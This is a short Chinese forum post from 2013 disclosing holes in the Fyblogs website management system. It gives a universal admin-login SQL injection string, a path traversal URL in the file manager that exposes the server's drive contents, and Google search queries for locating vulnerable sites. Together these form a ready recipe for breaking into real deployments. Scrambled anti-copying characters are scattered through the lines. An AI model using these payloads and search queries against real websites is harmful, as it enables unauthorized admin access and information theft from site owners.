找回密码
 立即注册
查看: 3103|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'
" J- y  J1 V( j$ {" ~" k& c9 g% ~, A8 c- E
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: F' ?: ]% k9 V2 S# u9 P( _4 c7 U2 badmin/uploadfile.asp?currentFolder=/upfiles/../
3 l: u1 c! _- K$ o  l; S) [: A
& Z, r0 U' \' o漏洞证明:
1 g- W8 H% L0 i( B% {0 J& a
% c2 A4 V1 M- I5 o谷歌:inurl:type.asp?id=1 新闻中心0 J; k1 }0 f1 w. x0 W4 v* z4 _
或者 :inurl:download_ok.asp?
; O, I" t! R" Z
" |( z6 W8 x3 N: P% ^5 I1 w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表